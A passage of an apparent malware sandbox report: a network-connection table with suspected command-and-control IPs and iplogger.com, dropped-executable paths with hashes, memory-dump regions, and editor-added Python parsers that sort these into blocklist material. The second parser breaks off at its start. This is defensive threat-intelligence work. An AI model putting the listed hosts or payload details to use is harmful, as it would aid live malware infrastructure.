| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.47.45.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.90.14.23.in-addr.arpa | udp |
| CN | 124.71.81.174:80 | N/A | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | f.123654987.xyz | udp |
| LT | 176.223.130.167:80 | 176.223.130.167 | tcp |
| LT | 176.223.130.167:80 | 176.223.130.167 | tcp |
| LT | 176.223.130.167:80 | 176.223.130.167 | tcp |
| LT | 176.223.130.167:80 | 176.223.130.167 | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.130.223.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| N/A | 192.168.1.2:1800 | N/A | tcp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:2404 | N/A | tcp |
| N/A | 127.0.0.1:2404 | N/A | tcp |
| N/A | 127.0.0.1:2404 | N/A | tcp |
| DE | 49.13.194.118:80 | 49.13.194.118 | tcp |
| RU | 5.42.66.47:80 | 5.42.66.47 | tcp |
| US | 8.8.8.8:53 | 118.194.13.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.66.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | free.360totalsecurity.com | udp |
| NL | 151.236.127.172:443 | free.360totalsecurity.com | tcp |
| MD | 94.103.188.126:80 | 94.103.188.126 | tcp |
| US | 8.8.8.8:53 | 172.127.236.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.188.103.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | softcatalog.ru | udp |
| RU | 88.212.252.98:443 | softcatalog.ru | tcp |
| US | 8.8.8.8:53 | 98.252.212.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | st.p.360safe.com | udp |
| US | 8.8.8.8:53 | s.360safe.com | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | iup.360safe.com | udp |
| N/A | 127.0.0.1:2404 | N/A | tcp |
| US | 8.8.8.8:53 | tr.p.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| IE | 54.76.174.118:80 | tr.p.360safe.com | udp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| US | 8.8.8.8:53 | 29.42.77.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.179.29.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.174.76.54.in-addr.arpa | udp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | int.down.360safe.com | udp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 104.21.76.57:443 | iplogger.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| SG | 118.194.235.187:50500 | N/A | tcp |
| US | 8.8.8.8:53 | 57.76.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.108.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.108.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.108.192.104.in-addr.arpa | udp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | sd.p.360safe.com | udp |
| GB | 18.165.158.188:80 | sd.p.360safe.com | tcp |
| US | 8.8.8.8:53 | ogs.google.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| GB | 142.250.187.238:443 | ogs.google.com | tcp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 172.217.169.3:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | 187.235.194.118.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.158.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| N/A | 127.0.0.1:2404 | N/A | tcp |
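Most rows in the Network table are sandbox noise: queries to the 8.8.8.8 resolver and the PTR lookups it performs for every address it sees. What matters for blocking is the residue once that is removed: connections made straight to an IP with no hostname (147.45.47.70, 124.71.81.174, 176.223.130.167, 49.13.194.118, 5.42.66.47, 94.103.188.126 and 118.194.235.187 on port 50500), connections to resolved names (iplogger.com, raw.githubusercontent.com), and names that were looked up but never connected to (f.123654987.xyz). The following is an added example by the editor, not code from the sandbox: it parses rows in this table's format into those buckets and tolerates rows whose Domain cell was dropped. It assumes 8.8.8.8 is the only resolver, as this table shows, and treats ports other than 80 and 443 as worth a second look; the sample rows are a constructed subset of the table above.

```python
"""Separate signal from sandbox noise in a report's Network table: drop
resolver traffic and reverse lookups, then bucket what remains into
connections to resolved hostnames, direct-to-IP connections, lookups that
never produced a connection, and local/multicast chatter. Added example."""
import ipaddress

# Constructed sample: a subset of the behavioral1 Network rows on this page.
SAMPLE_TABLE = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| RU | 147.45.47.70:80 | 147.45.47.70 | tcp |
| US | 8.8.8.8:53 | 70.47.45.147.in-addr.arpa | udp |
| CN | 124.71.81.174:80 | N/A | tcp |
| US | 8.8.8.8:53 | f.123654987.xyz | udp |
| LT | 176.223.130.167:80 | 176.223.130.167 | tcp |
| LT | 176.223.130.167:80 | 176.223.130.167 | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:2404 | N/A | tcp |
| MD | 94.103.188.126:80 | 94.103.188.126 | tcp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 104.21.76.57:443 | iplogger.com | tcp |
| SG | 118.194.235.187:50500 | N/A | tcp |
| N/A | 224.0.0.251:5353 | N/A | udp |
"""

RESOLVERS = {"8.8.8.8"}   # the sandbox's DNS server (assumption taken from the table)
COMMON_PORTS = {80, 443}


def parse_rows(text):
    """Yield (country, ip, port, domain, proto). Rows whose Domain cell was
    dropped, leaving the protocol in the third column, are repaired."""
    for line in text.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if cells[0] == "Country":
            continue
        cells = [c for c in cells if c]          # drop empty trailing cells
        if len(cells) == 3 and cells[2].lower() in ("tcp", "udp"):
            cells.insert(2, "N/A")
        if len(cells) != 4:
            continue
        country, dest, domain, proto = cells
        ip, _, port = dest.rpartition(":")
        yield country, ip, int(port), domain, proto.lower()


def triage_network(text):
    lookups, connected = set(), {}
    direct, nonstd, local = set(), set(), set()
    reverse = 0
    for _, ip, port, domain, _proto in parse_rows(text):
        addr = ipaddress.ip_address(ip)
        if ip in RESOLVERS and port == 53:
            if domain.endswith(".in-addr.arpa"):
                reverse += 1                     # sandbox PTR noise, not malware behaviour
            elif domain != "N/A":
                lookups.add(domain)
            continue
        endpoint = f"{ip}:{port}"
        if addr.is_loopback or addr.is_private or addr.is_multicast:
            local.add(endpoint)
            continue
        if domain in ("N/A", "") or domain == ip:
            direct.add(endpoint)                 # no hostname: hard-coded payload/C2 host
        else:
            connected.setdefault(domain, set()).add(endpoint)
        if port not in COMMON_PORTS:
            nonstd.add(endpoint)
    return {
        "direct_ip": sorted(direct),
        "resolved": {d: sorted(e) for d, e in sorted(connected.items())},
        "lookups_without_connection": sorted(lookups - set(connected)),
        "nonstandard_ports": sorted(nonstd),
        "local": sorted(local),
        "reverse_lookups_dropped": reverse,
    }


if __name__ == "__main__":
    for key, value in triage_network(SAMPLE_TABLE).items():
        print(f"{key}: {value}")
```

The direct-to-IP list is what goes into a block rule; the resolved list needs the domain, since iplogger.com and raw.githubusercontent.com sit on shared infrastructure whose addresses are not safe to block; the lookups-without-connection bucket is where a DGA-looking name such as f.123654987.xyz surfaces even though the sandbox never saw a session to it.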
Files
memory/2960-0-0x00007FF8598C3000-0x00007FF8598C5000-memory.dmp
memory/2960-1-0x0000000000F50000-0x0000000000F58000-memory.dmp
memory/2960-2-0x00007FF8598C0000-0x00007FF85A381000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
| MD5 | e817cc929fbc651c5bdab9e8cca0d9d9 |
| SHA1 | 4d73dc2afcde6a1dcf9417c0120252a2d8fd246f |
| SHA256 | 3a7327bd54ba0dfa36bbf0b9d0dc820984d6d0e0316cfa4045ab4c1e7e447282 |
| SHA512 | a9c1e547ef74c20e0a21dfc951463fb6883a23da4c323c96c5e64ac5793e774ceae898d4cf486e1bf1ea8fb69360610639a1046005fcdb9bd9f8463aec4a3e2f |
memory/3624-14-0x000000007514E000-0x000000007514F000-memory.dmp
memory/3624-15-0x0000000000E20000-0x0000000001060000-memory.dmp
memory/3624-16-0x0000000075140000-0x00000000758F0000-memory.dmp
memory/3624-18-0x0000000006D30000-0x0000000006F4E000-memory.dmp
memory/3624-17-0x00000000059E0000-0x0000000005BFC000-memory.dmp
memory/3624-19-0x0000000007530000-0x0000000007AD4000-memory.dmp
memory/3624-20-0x0000000007020000-0x00000000070B2000-memory.dmp
memory/3624-21-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-22-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-29-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-56-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-58-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-76-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-84-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-82-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-80-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-78-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-74-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-72-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-70-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-68-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-66-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-64-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-62-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-60-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-54-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-52-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-50-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-48-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-46-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-38-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-36-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-34-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-32-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-30-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-44-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-42-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-26-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-40-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-24-0x0000000006D30000-0x0000000006F48000-memory.dmp
memory/3624-4907-0x0000000075140000-0x00000000758F0000-memory.dmp
memory/3624-4908-0x0000000007270000-0x00000000072C8000-memory.dmp
memory/3624-4909-0x00000000072D0000-0x000000000731C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\55.exe
| MD5 | 821f6662f6e721a43d020dc488a4a040 |
| SHA1 | d272ea0525684d2466ce0d58ad13a90e28bd1949 |
| SHA256 | c86b92d987b2f716cbdf2a772e55de445ce599ddeaecff6e47cef72ac61b0568 |
| SHA512 | 000b67d9127950369ba6cfb651d20efadcce5b23e1da62a68d20c594e8ad81702e26cc74f5e4eff927727faa0c2a303f5446acb1276a81a47b858a293775ee29 |
C:\Users\Admin\AppData\Local\Temp\a\3.exe
| MD5 | 2eb0ac82f49347944e4ef29cb53eca48 |
| SHA1 | c28c8c943d7ccc805cbc5cdc5f697d1ee3815b0f |
| SHA256 | 86c8da270e82ac4d2e27ac6ec56d7dd1df44d2bcb9ce22e008d9647fdba87243 |
| SHA512 | 6e9f916a6239b27ef4120ffd235409c9476cc49fdecbfff31fc5c15cb5769b39107ea4e1d93c61f60ec3df22ea5d09723a42d6287e7b52f77843357f04a8e327 |
C:\Users\Admin\AppData\Local\Temp\a\munqk.exe
| MD5 | dc7b784b8e4f9db78f88cb20dfbda030 |
| SHA1 | 6045e1d486dd095e43bf4f922500b15e05194719 |
| SHA256 | 92b62c8fbfb7f3002fbf04c225452381e4323834d6de26ec9b17d9691ef900dc |
| SHA512 | 13878e992cb3de1d13e9edd998e3043b692ca4e946bb1581d06943059657312158d70f36702f63fa602666576c6a9c49f9ca14ed0d16c40cabe30066e94c8535 |
C:\Users\Admin\AppData\Local\Temp\a\17.exe
| MD5 | 7ba50890ab7bfc1dd9e88c182a689fb9 |
| SHA1 | 33d4767c38e5586511a94ed03900495777bd4029 |
| SHA256 | 080aaaa296ddc41c2a448d2d39652608994dbe17019cd3fcb081d89ad3acad15 |
| SHA512 | 92a245d09c4c55c99915a94d762128f4ac3d6c2705d06d2b6c62243c654e9209233b28aa928f10e473672422673febd36281981826a4d361201403a3d56237bf |
C:\Users\Admin\AppData\Local\Temp\a\network.exe
| MD5 | a13c1ec24d6b087a6ac188b0fd254178 |
| SHA1 | fbe22171427327ec23240f5bc9896854110f360a |
| SHA256 | 7b7f9647dbc512c0f9857332b181991b1e8f6b1ab0634f31d8612ee483d2933f |
| SHA512 | 1ab541db748b8817e069d1ff73037e606f2913a57078e2080d60a1fbdb108d7d5b7698b10304ea271a48493432b20a14ac464fa584c0fa6bea27d7c78369acf5 |
memory/3248-4961-0x0000000002810000-0x0000000002846000-memory.dmp
memory/3248-4970-0x0000000005080000-0x00000000056A8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\maikati.exe
| MD5 | bf0c635d0132b4318ae9dc4bc7269919 |
| SHA1 | 520708e247e52a5899143a768d36f0544828cadb |
| SHA256 | 97464eeb75791bf12ac3c78eeae121d066ef799e33cd4959f13eff4c257776d8 |
| SHA512 | 77b91bc40734cc0374b250c618360ca7e74c878e6715c60ad6627ce6e94cd9b6b5b92f8ccd52e592bf083903a17e6c8083f3f0783a721e902e57f39ce64f85d3 |
memory/3248-4984-0x0000000004FC0000-0x0000000005026000-memory.dmp
memory/3248-4983-0x0000000004E20000-0x0000000004E42000-memory.dmp
memory/3248-4985-0x00000000056B0000-0x0000000005716000-memory.dmp
memory/3248-4994-0x00000000057A0000-0x0000000005AF4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_33kbu4xy.pvi.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3248-5005-0x0000000005E00000-0x0000000005E1E000-memory.dmp
memory/3148-5004-0x0000000000400000-0x0000000000412000-memory.dmp
memory/3248-5006-0x0000000005E30000-0x0000000005E7C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe
| MD5 | b11913361b2d4c43c00c1969184050a8 |
| SHA1 | 8358fa3426e4136e0873a32f49f5f367770bad0a |
| SHA256 | de39bc2c5f18ae468501a573ee5cb9b22f2f608ec2fc51954b44d4549fac2a57 |
| SHA512 | 2d25c021ddf59a10b63c56d85a550e7454767444472f3e40662dda1e1dddeef551202253cf9137bf4054ed832cd59c53b66aba6d42361f044fe4e7b06bef2026 |
memory/3248-5019-0x00000000063E0000-0x0000000006412000-memory.dmp
memory/3248-5020-0x000000006F820000-0x000000006F86C000-memory.dmp
memory/3248-5031-0x0000000007000000-0x00000000070A3000-memory.dmp
memory/3248-5030-0x0000000006FE0000-0x0000000006FFE000-memory.dmp
memory/3248-5033-0x0000000007120000-0x000000000713A000-memory.dmp
memory/3248-5032-0x0000000007760000-0x0000000007DDA000-memory.dmp
memory/3248-5034-0x0000000007190000-0x000000000719A000-memory.dmp
memory/3248-5035-0x00000000073A0000-0x0000000007436000-memory.dmp
memory/3248-5036-0x0000000007320000-0x0000000007331000-memory.dmp
memory/3248-5037-0x0000000007350000-0x000000000735E000-memory.dmp
memory/3248-5038-0x0000000007360000-0x0000000007374000-memory.dmp
memory/3248-5039-0x0000000007460000-0x000000000747A000-memory.dmp
memory/3248-5040-0x0000000007440000-0x0000000007448000-memory.dmp
memory/2960-5052-0x00007FF8598C3000-0x00007FF8598C5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe
| MD5 | 66a5a529386533e25316942993772042 |
| SHA1 | 053d0d7f4cb6e3952e849f02bbfbdb4d39021146 |
| SHA256 | 713a497c8da97c2082758fd31147539f408a72b62041c6c9ed77037021621e94 |
| SHA512 | 9f4f69e9d1a3265311cd9f4bb9a254f157e1e0b7536466e88449f410f297d501d10448b170901206fff0ffde6d7e8a50b84e391fd62ff0f9355b506959cc336a |
C:\Users\Admin\AppData\Local\Temp\nseC2B5.tmp\UAC.dll
| MD5 | adb29e6b186daa765dc750128649b63d |
| SHA1 | 160cbdc4cb0ac2c142d361df138c537aa7e708c9 |
| SHA256 | 2f7f8fc05dc4fd0d5cda501b47e4433357e887bbfed7292c028d99c73b52dc08 |
| SHA512 | b28adcccf0c33660fecd6f95f28f11f793dc9988582187617b4c113fb4e6fdad4cf7694cd8c0300a477e63536456894d119741a940dda09b7df3ff0087a7eada |
C:\Users\Admin\AppData\Local\Temp\nseC2B5.tmp\nsExec.dll
| MD5 | 132e6153717a7f9710dcea4536f364cd |
| SHA1 | e39bc82c7602e6dd0797115c2bd12e872a5fb2ab |
| SHA256 | d29afce2588d8dd7bb94c00ca91cac0e85b80ffa6b221f5ffcb83a2497228eb2 |
| SHA512 | 9aeb0b3051ce07fb9f03dfee7cea4a5e423425e48cb538173bd2a167817f867a30bd4d27d07875f27ca00031745b24547030b7f146660b049fa717590f1c77e1 |
C:\Users\Admin\AppData\Local\Temp\putty\Smartscreen.bat
| MD5 | f6423b02fa9b2de5b162826b26c0dc56 |
| SHA1 | 01e7e79e6018c629ca11bc30f15a1a3e6988773e |
| SHA256 | 59f52a56309ecb5c9c256a88db12a60403e5b0a8c0b8c013e7f6c9c5c395ff83 |
| SHA512 | 5974e3a1bfe84719a2af614995f821d1c0a751b2ef2b39a3f6087c31dec609eb57d0824a28304e68365b75a0c7a3978aa28ed26c8f392976bd3337c1e8561459 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe
| MD5 | 0c2564813f2b9fc088cfb6938214d3cb |
| SHA1 | cbb0bc2dfe83d38b9e4a8e47d182e6d7ee6a29b0 |
| SHA256 | 1043faf46b5a19cbe10410e01725b38caf0db7f36b73c68e103ebca8da2d18d2 |
| SHA512 | 06d4df2ed5d79c1d33ca06d977d936643c78139f484747bdfaac690b84f064620a6dc33014b0146acebce4e935688dc2a1445e7e2f830ec3b75e5e2dafa02ed1 |
memory/4484-5099-0x0000000006480000-0x00000000067D4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 97cc569c9c7b2be6e68a9922c460c6c6 |
| SHA1 | 02e654678b61e1b4c3fe6d14f38240fa09b33627 |
| SHA256 | 752ca416ea5cd4635b6227bbb5c568d2bcf3c2e0e48c7809aa83e16cbb2dc7fd |
| SHA512 | 12e7e08dbc5af14633506a82591b806e0a10616a67f36d996e1c624efc84016366153019257d1d96284a07b5838b2cff776ae2709213ec528d4867d9b826e0f5 |
memory/4888-5101-0x000000001B7C0000-0x000000001BC8E000-memory.dmp
memory/4484-5102-0x0000000006970000-0x00000000069BC000-memory.dmp
memory/4888-5103-0x000000001B220000-0x000000001B2C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\New.exe
| MD5 | 384cc82bf0255c852430dc13e1069276 |
| SHA1 | 26467194c29d444e5373dfdde2ff2bca1c12ef9a |
| SHA256 | ba2567627674eada0b5462b673cdea4ed11a063174c87b775927db7e7d6ef99c |
| SHA512 | 7838ee81a8d13c3722627424270ac877081afc399be862ce9b1614a1df3c12f98066d28f2a9a81bcf626f14fe90d83ef8039cd679f40851f2d6d83c3839e73be |
memory/3688-5115-0x000001E4F8F50000-0x000001E4F8F5A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
| MD5 | 2de14d82238bf5395e0b95e551ab8e00 |
| SHA1 | f9c7f00ad7c624d190e06cda3c5adf02bb207074 |
| SHA256 | aa9d5004f89fe3952e5ee0b148e6a36574d372bb5ffadae5733a7ee77127f8d4 |
| SHA512 | 9a5f2f781b52ea793021bf641a8be95f9611bfe936e9bd96978ec9066b4a7390b847f2e597cfd9ac69de9ac35b7238147538a23c3a27313d19c16258e2446f2a |
memory/2960-5125-0x00007FF8598C0000-0x00007FF85A381000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\{D9B79AAE-9C59-4341-BA35-F85D0FF2FE33}.tmp\360P2SP.dll
| MD5 | fc1796add9491ee757e74e65cedd6ae7 |
| SHA1 | 603e87ab8cb45f62ecc7a9ef52d5dedd261ea812 |
| SHA256 | bf1b96f5b56be51e24d6314bc7ec25f1bdba2435f4dfc5be87de164fe5de9e60 |
| SHA512 | 8fa2e4ff5cbc05034051261c778fec1f998ceb2d5e8dea16b26b91056a989fdc58f33767687b393f32a5aff7c2b8d6df300b386f608abd0ad193068aa9251e0d |
C:\Users\Admin\AppData\Local\Temp\putty.zip
| MD5 | 188fbf5c7b5748e1f750be2bab44e0a0 |
| SHA1 | 525afccfc532830f71f068acfbf9ac49a1463539 |
| SHA256 | 14a23a25c21deba6f3a85d2e24085a95881302499bcdde6dc9a585fe46b9f370 |
| SHA512 | 62d6232ec09e266585f29c9fe335a6f02cfc0dbd8aa02545b0648eec7424aa25c4138cff49015073aede2a45506c056cbaa592cfc5d3a537313d9ee5bf1c6608 |
C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
| MD5 | 7a9a33206f80078ba80f7a839cd92451 |
| SHA1 | 55447378c48561c35bad1317b58a34ee50c5072f |
| SHA256 | e53c379d95e95706c5a2c4d6cd609857368a3bf14f28d7e67f6e3f8dfce6d486 |
| SHA512 | 61873ed9b7616de998eff2ca90c6698cb0df87d181344fc6e02fd70fcd87fd8028cfdb7f606a3637514463982c161549729145118190e42b7f47365716f23aba |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ea98e583ad99df195d29aa066204ab56 |
| SHA1 | f89398664af0179641aa0138b337097b617cb2db |
| SHA256 | a7abb51435909fa2d75c6f2ff5c69a93d4a0ab276ed579e7d8733b2a63ffbee6 |
| SHA512 | e109be3466e653e5d310b3e402e1626298b09205d223722a82344dd78504f3c33e1e24e8402a02f38cd2c9c50d96a303ce4846bea5a583423937ab018cd5782f |
\??\pipe\LOCAL\crashpad_1648_OHBPTTCBIUVHGZCH
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 4f7152bc5a1a715ef481e37d1c791959 |
| SHA1 | c8a1ed674c62ae4f45519f90a8cc5a81eff3a6d7 |
| SHA256 | 704dd4f98d8ca34ec421f23ba1891b178c23c14b3301e4655efc5c02d356c2bc |
| SHA512 | 2e6b02ca35d76a655a17a5f3e9dbd8d7517c7dae24f0095c7350eb9e7bdf9e1256a7009aa8878f96c89d1ea4fe5323a41f72b8c551806dda62880d7ff231ff5c |
C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini
| MD5 | e6edb41c03bce3f822020878bde4e246 |
| SHA1 | 03198ad7bbfbdd50dd66ab4bed13ad230b66e4d9 |
| SHA256 | 9fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454 |
| SHA512 | 2d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1 |
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 184a117024f3789681894c67b36ce990 |
| SHA1 | c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e |
| SHA256 | b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e |
| SHA512 | 354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f35ebabea3c72e7e3592d8579466e809 |
| SHA1 | 5dba94f1ac3ff3dc53ec551045989688870911b3 |
| SHA256 | a4ecc4d400e6f657d6eaab20b2a1a65879266dec7ce55b1df04d89eddf6e4017 |
| SHA512 | 7f3fa07e231ea803ac400706a5be9c8678f8fba6c718335c35e13983b281488737037e663a65842888bf4bf18f50434c5bc0b401f80913fb23e02b27825a18ab |
memory/3688-5193-0x000001E4FB740000-0x000001E4FB7A8000-memory.dmp
memory/5500-5251-0x0000000000400000-0x0000000000416000-memory.dmp
memory/5280-5254-0x0000017964810000-0x0000017964832000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3156cafb50c37e6491b22084c60d4ce0 |
| SHA1 | c148c1217e3eed6ec3acaf8a9a020dc036d7d8f7 |
| SHA256 | a3eeca9076a1efaa46c5f63e4cd12fe84766a46f6c7013aa1f2f4bf361543010 |
| SHA512 | 968186a0a54ec1e107ea914f9de28cf677c6674093ea179eed03c0448fa19c40fbbb421fdc13101d49ab213760812ef7c792102d1b8e41421c8462c483bf3a06 |
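An added example, not part of the sandbox report: a small Python parser for the dropped-file and memory-dump listing above, written to turn it into blocklist material without carrying junk across. It recognises the `| MD5 | … |` hash rows under each path and the `memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp` names, flags digests of the wrong length and digests equal to the well-known empty-input values (the `\??\pipe\LOCAL\crashpad_…` entry above is one: it is a named pipe, not a payload, and its hashes must not become IOCs), and works out the size of every dumped region, since the largest region of a process is the usual first place to look for an unpacked payload (for example the 0x400000–0x412000 image-base region of PID 3148 above). The embedded sample is a constructed excerpt of this listing with the munqk.exe SHA512 row omitted; the function names are the example's own.

```python
from __future__ import annotations

import hashlib
import re
from dataclasses import dataclass, field

# Digests of a zero-length input. A dropped "file" reported with these was empty
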